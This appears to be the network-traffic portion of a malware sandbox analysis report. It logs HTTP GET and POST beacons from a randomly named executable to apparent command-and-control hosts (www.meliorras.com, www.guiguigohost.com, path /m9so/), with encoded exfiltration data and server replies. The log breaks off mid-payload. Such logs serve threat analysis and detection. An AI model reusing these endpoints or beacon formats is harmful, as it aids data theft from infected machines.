oyq3iQcWdurQQNS0m39gQeg0VAHdh1TaYuAdAWkfG28J3s5Hi/uraoIw2AN48/hw85xGGZNbkCO/NFRJcqE4ci+GK/P2ek9Kqc2+UIytSxLh+K89fbO4kLpQmV8Il1LV9C2uGiii+OKHF4CN0l
                                                                                    Mar 18, 2024 14:54:07.242408991 CET10288OUTData Raw: 74 6c 4c 31 59 66 72 77 53 6d 49 53 53 72 6d 6d 6a 58 4b 62 6a 42 64 68 76 62 67 58 47 38 36 62 65 48 4f 46 6f 75 75 75 7a 7a 5a 6a 62 7a 7a 4d 2f 33 57 4f 38 37 65 7a 75 39 65 6d 72 37 6d 53 30 6c 49 65 39 72 36 37 56 51 6a 54 61 54 59 6b 33 38
                                                                                    Data Ascii: tlL1YfrwSmISSrmmjXKbjBdhvbgXG86beHOFouuuzzZjbzzM/3WO87ezu9emr7mS0lIe9r67VQjTaTYk38ZOkODxaiVqyvNx34OEaOBVgRxP+bfcSCGSxB+ZvtNEGEsNdJxDL9vB3KuJDeLQJyJMyCY7LDOESvjXbdPLXH/N+rPPylaY4OTMThrmo6Z1PJmQQ+5qwrhgqrRglKVxCy4q2NWjRIEe+NY+3WjE9NTNPBoc5YBjBiv
                                                                                    Mar 18, 2024 14:54:07.398227930 CET1286OUTData Raw: 68 51 61 78 58 76 50 4c 6c 64 45 34 49 63 65 46 44 48 71 37 50 62 47 4a 54 65 46 78 32 46 6f 31 33 59 75 42 39 43 2b 69 47 65 6a 69 56 49 46 4e 34 6a 6f 57 36 43 45 2f 5a 57 71 47 74 2f 79 4c 79 37 67 36 57 73 59 55 42 34 4e 38 2f 64 38 35 63 59
                                                                                    Data Ascii: hQaxXvPLldE4IceFDHq7PbGJTeFx2Fo13YuB9C+iGejiVIFN4joW6CE/ZWqGt/yLy7g6WsYUB4N8/d85cYPNRXbrZBCMYMzgBCGfG/MKX20xZcWYLen5hagVtsn49uiSVMtgpALSFVbN2Ofa2yuSy93K7SJcKHquhpO9pl7HoPRQTrrHtKu2Y5ijLA8bekWtzWWuedRzNRMqzNytO+UQzIW4CrUGPmK5+s60VFrzZTHN68Xx2Vj
                                                                                    Mar 18, 2024 14:54:07.398298979 CET6430OUTData Raw: 42 51 67 4b 6e 7a 44 66 79 2b 39 6a 55 56 52 63 50 4e 67 63 61 68 4b 48 65 62 57 5a 4e 36 47 55 44 33 70 47 43 68 49 46 65 77 32 71 6c 51 32 52 51 5a 4b 34 4e 66 43 6b 74 51 47 2b 54 64 75 58 2f 35 62 41 6c 69 34 78 72 4f 2b 4a 67 51 32 43 44 49
                                                                                    Data Ascii: BQgKnzDfy+9jUVRcPNgcahKHebWZN6GUD3pGChIFew2qlQ2RQZK4NfCktQG+TduX/5bAli4xrO+JgQ2CDIviz/QTmnNxdcaGh8hFJh/0zSVQqo7aia+W7I5CXiVChQD+MJ2jVhjU/hlmoHr221gzlWpsOKta5nJJeEHjurGIGfyd2VuSbVo+/Q56tcYA39GT+ZEypyFnlr0pLgKuSIv4JoVhmWfEztdZMh4jKI5ja4pYSDqFwuB


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.11.204982884.32.84.32807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:54:09.929078102 CET532OUTGET /m9so/?LFPxWlV=hV0gUtH6eivuG6a1gtKJKPXk2w7TZurpdSJvAkXahnCKr3ZNP6l/DgROigVMeqNmcpawXvZwG91uaBFQ9vCDEXt4463W6r+4wKZPe4czMIeO7JeDEKZ34NE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.meliorras.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:54:10.084013939 CET1286INHTTP/1.1 200 OK
                                                                                    Server: hcdn
                                                                                    Date: Mon, 18 Mar 2024 13:54:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 10066
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    x-hcdn-request-id: 477fd5770c0349a2bf540f4dc00c00cc-phx-edge1
                                                                                    Expires: Mon, 18 Mar 2024 13:54:09 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67
                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding
                                                                                    Mar 18, 2024 14:54:10.084059954 CET1286INData Raw: 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23
                                                                                    Data Ascii: :0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weigh
                                                                                    Mar 18, 2024 14:54:10.084172010 CET1286INData Raw: 72 3a 23 63 64 63 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61
                                                                                    Data Ascii: r:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:2
                                                                                    Mar 18, 2024 14:54:10.084201097 CET1286INData Raw: 67 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d
                                                                                    Data Ascii: ge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.mess
                                                                                    Mar 18, 2024 14:54:10.084214926 CET1286INData Raw: 67 65 72 2e 63 6f 6d 2f 74 75 74 6f 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c
                                                                                    Data Ascii: ger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href
                                                                                    Mar 18, 2024 14:54:10.084228039 CET1286INData Raw: 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                    Data Ascii: y website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-ti
                                                                                    Mar 18, 2024 14:54:10.084252119 CET1286INData Raw: 66 6f 72 28 76 61 72 20 72 2c 65 3d 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72
                                                                                    Data Ascii: for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}retu
                                                                                    Mar 18, 2024 14:54:10.084265947 CET1286INData Raw: 31 29 2d 36 35 3c 32 36 29 2c 6d 2e 73 70 6c 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66
                                                                                    Data Ascii: 1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var
                                                                                    Mar 18, 2024 14:54:10.084275961 CET118INData Raw: 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70
                                                                                    Data Ascii: .location.hostname,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.11.2049829195.110.124.133807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:54:15.768569946 CET805OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.guiguigohost.com
                                                                                    Origin: http://www.guiguigohost.com
                                                                                    Referer: http://www.guiguigohost.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 61 69 55 6c 70 31 35 2f 6f 6d 33 75 61 54 77 4b 4d 58 49 6f 44 38 70 6f 4d 4e 6e 55 6b 37 68 71 41 6b 75 64 37 50 43 30 65 32 7a 54 48 6e 59 37 48 6b 69 63 52 4b 71 69 48 75 74 62 78 6d 6d 43 38 6d 4c 51 35 32 48 75 36 65 6e 70 31 50 2b 5a 6b 6e 6c 7a 69 2f 35 4b 65 47 62 64 63 2f 5a 2b 33 4b 62 4a 54 76 70 72 68 78 49 76 69 54 54 4a 74 5a 37 6d 47 77 53 58 34 59 73 30 31 61 79 50 61 4f 58 33 4e 53 43 34 6b 4e 68 6b 4d 54 56 33 7a 39 58 2f 32 58 62 56 7a 6e 47 2b 33 53 57 6e 36 44 71 59 51 31 33 74 48 59 6b 4c 6e 6d 37 39 4e 64 55 55 70 78 4d 75 66 74 35 6d 65 50 50 30 4b 67 3d 3d
                                                                                    Data Ascii: LFPxWlV=aiUlp15/om3uaTwKMXIoD8poMNnUk7hqAkud7PC0e2zTHnY7HkicRKqiHutbxmmC8mLQ52Hu6enp1P+Zknlzi/5KeGbdc/Z+3KbJTvprhxIviTTJtZ7mGwSX4Ys01ayPaOX3NSC4kNhkMTV3z9X/2XbVznG+3SWn6DqYQ13tHYkLnm79NdUUpxMuft5mePP0Kg==
                                                                                    Mar 18, 2024 14:54:15.955194950 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:54:15 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.11.2049830195.110.124.133807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:54:18.470972061 CET1145OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.guiguigohost.com
                                                                                    Origin: http://www.guiguigohost.com
                                                                                    Referer: http://www.guiguigohost.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 61 69 55 6c 70 31 35 2f 6f 6d 33 75 62 33 30 4b 4c 30 51 6f 42 63 70 76 48 74 6e 55 76 62 68 75 41 6a 6d 64 37 4f 47 61 65 41 44 54 48 47 6f 37 47 6c 69 63 53 4b 71 69 65 65 74 6b 73 57 6d 46 38 6d 48 79 35 33 37 75 36 65 7a 70 32 64 32 5a 69 58 6c 38 73 66 35 4a 66 47 62 65 59 2f 5a 6a 33 4b 48 6b 54 75 4e 72 30 52 30 76 73 78 4c 4a 38 34 37 6e 51 67 53 5a 6f 6f 73 7a 2f 36 79 42 61 4f 61 49 4e 53 4b 6f 6b 64 5a 6b 56 7a 31 33 68 74 58 38 76 33 62 53 78 6e 48 33 32 7a 37 72 33 51 47 30 51 6e 7a 4a 4f 36 63 75 72 45 6e 49 4a 65 77 33 37 68 63 4c 62 4f 73 73 51 2b 57 64 63 63 4b 37 4a 37 48 51 32 51 76 37 73 79 6f 4b 41 44 30 77 39 30 51 67 63 6b 57 77 55 77 75 76 64 36 2b 35 6d 4b 6d 41 79 6e 58 57 48 70 6a 5a 62 62 39 71 70 62 50 35 62 61 52 38 42 57 61 75 41 32 39 79 53 63 44 39 43 44 67 68 43 49 43 52 69 31 35 46 52 34 33 44 73 59 74 38 42 75 41 6c 62 37 41 35 6a 77 6c 57 2f 4c 4b 74 47 2b 56 78 77 49 39 38 54 67 49 61 47 33 63 63 78 66 67 63 70 46 35 2b 47 59 7a 4c 48 45 79 72 73 70 70 71 74 69 54 64 41 54 31 68 69 37 4b 74 7a 6a 4d 37 55 77 77 73 78 73 4a 7a 65 64 5a 75 32 4c 6d 71 4c 56 47 65 2b 79 6c 58 30 77 38 6f 4b 44 58 51 48 33 45 6b 63 5a 62 33 35 72 4e 30 73 4b 65 44 77 66 4b 63 37 64 53 6b 76 71 79 41 75 77 31 39 4c 56 5a 63 59 64 44 47 47 44 52 65 68 41 45 37 5a 76 45 32 48 6b 35 2b 31 4d 54 68 67 39 33 30 4b 5a 6b 45 30 72 4e 4d 6f 61 77 79 44 37 57 7a 66 30 6e 43 6e 4a 43 34 72 33 31 4f 63 2f 2f 78 6b 32 46 61 75 45 73 6c 7a 54 4c 39 61 64 74 46 6f 48 41 76 70 66 48 6b 47 79 2f 39 78 6c 54 44 41 33 47 4e 57 56 53 68 39 63 33 65 75 4e 73 77 75 57 74 32 2f 62 34 3d
                                                                                    Data Ascii: LFPxWlV=aiUlp15/om3ub30KL0QoBcpvHtnUvbhuAjmd7OGaeADTHGo7GlicSKqieetksWmF8mHy537u6ezp2d2ZiXl8sf5JfGbeY/Zj3KHkTuNr0R0vsxLJ847nQgSZoosz/6yBaOaINSKokdZkVz13htX8v3bSxnH32z7r3QG0QnzJO6curEnIJew37hcLbOssQ+WdccK7J7HQ2Qv7syoKAD0w90QgckWwUwuvd6+5mKmAynXWHpjZbb9qpbP5baR8BWauA29yScD9CDghCICRi15FR43DsYt8BuAlb7A5jwlW/LKtG+VxwI98TgIaG3ccxfgcpF5+GYzLHEyrsppqtiTdAT1hi7KtzjM7UwwsxsJzedZu2LmqLVGe+ylX0w8oKDXQH3EkcZb35rN0sKeDwfKc7dSkvqyAuw19LVZcYdDGGDRehAE7ZvE2Hk5+1MThg930KZkE0rNMoawyD7Wzf0nCnJC4r31Oc//xk2FauEslzTL9adtFoHAvpfHkGy/9xlTDA3GNWVSh9c3euNswuWt2/b4=
                                                                                    Mar 18, 2024 14:54:18.658966064 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:54:18 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.11.2049831195.110.124.133807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:54:21.174032927 CET12860OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.guiguigohost.com
                                                                                    Origin: http://www.guiguigohost.com
                                                                                    Referer: http://www.guiguigohost.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 61 69 55 6c 70 31 35 2f 6f 6d 33 75 62 33 30 4b 4c 30 51 6f 42 63 70 76 48 74 6e 55 76 62 68 75 41 6a 6d 64 37 4f 47 61 65 44 6a 54 48 55 77 37 48 47 4b 63 54 4b 71 69 42 75 74 6c 73 57 6d 55 38 6d 66 32 35 33 33 51 36 63 4c 70 76 75 4f 5a 69 69 78 38 38 50 35 49 47 32 62 63 63 2f 59 2f 33 4b 62 72 54 75 6f 57 68 78 41 76 69 52 37 4a 74 2f 76 6d 50 67 53 58 6f 6f 73 42 37 36 7a 30 61 4f 65 69 4e 53 47 6f 6b 62 5a 6b 57 6c 78 33 79 4f 2f 38 37 33 62 52 36 48 48 30 35 54 37 43 33 51 69 4b 51 6e 79 2b 4f 37 6f 75 72 45 48 49 49 66 77 30 34 42 63 4c 41 4f 73 72 55 2b 4b 52 63 63 58 6f 4a 2f 50 51 32 53 2f 37 74 53 6f 4b 46 69 30 7a 71 6b 51 71 65 55 58 6f 43 41 79 33 64 36 71 74 6d 49 71 41 79 33 44 57 48 65 58 5a 58 61 39 71 6b 62 50 37 47 71 52 6a 55 6d 61 69 41 32 74 49 53 64 6a 74 43 46 4d 68 44 73 61 52 30 45 35 47 63 49 32 49 77 49 74 6c 46 75 64 78 62 37 51 6c 6a 77 6c 47 2f 4b 4f 74 47 74 39 78 78 4b 56 2f 55 77 49 42 54 6e 63 4a 37 2f 73 6f 70 46 31 4d 47 59 4c 69 48 48 65 72 71 35 70 71 76 44 54 61 4f 6a 30 6e 67 37 4b 46 39 44 4e 74 55 33 34 77 78 74 63 49 65 4d 6c 75 33 36 57 71 63 56 47 64 37 53 6c 54 2b 51 38 6d 62 54 58 51 48 33 49 61 63 5a 6e 33 35 66 42 30 73 34 57 44 7a 2b 4b 63 6f 4e 53 6d 76 71 7a 45 75 78 4a 77 4c 56 51 2f 59 63 54 73 47 47 70 65 34 79 38 37 65 75 45 33 44 55 35 42 78 4d 54 4d 75 64 79 69 4b 59 49 4d 30 76 70 79 6f 70 45 79 41 37 47 7a 49 6b 6e 42 74 4a 43 37 39 6e 31 69 4c 76 79 6f 6b 77 67 74 75 48 77 4c 7a 55 58 39 65 70 78 61 35 55 63 46 31 38 6a 30 47 77 4b 42 2b 48 61 52 42 6b 32 31 64 56 53 42 37 71 33 36 67 4d 34 4b 2b 46 42 4f 74 72 57 72 35 63 4c 70 75 50 45 51 77 79 6d 54 48 35 58 47 48 52 75 44 30 4d 4b 32 